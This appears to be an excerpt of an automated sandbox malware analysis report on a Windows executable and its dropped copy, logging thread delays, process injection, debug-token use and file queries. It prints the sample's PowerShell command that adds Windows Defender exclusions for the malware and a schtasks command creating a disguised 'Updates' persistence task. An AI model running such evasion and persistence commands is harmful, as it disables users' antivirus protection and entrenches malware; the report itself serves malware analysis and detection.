Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596782
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596438
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596063
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595579
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595454
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595329
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595093
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594956
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594831
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594710
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594601
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594491
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594375
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594266
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594156

Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: ZTEIhNCtP3.exe, 00000000.00000002.911448125.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: IhgfSppexA
Source: svchost.exe, 0000000D.00000002.2854906255.0000018F14E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2854971100.0000018F14E55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2854254355.0000018F0F82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Code function: 7_2_05839668 LdrInitializeThunk,

7_2_05839668

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe"
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory written: C:\Users\user\Desktop\ZTEIhNCtP3.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory written: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Users\user\Desktop\ZTEIhNCtP3.exe "C:\Users\user\Desktop\ZTEIhNCtP3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process created: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Users\user\Desktop\ZTEIhNCtP3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Users\user\Desktop\ZTEIhNCtP3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
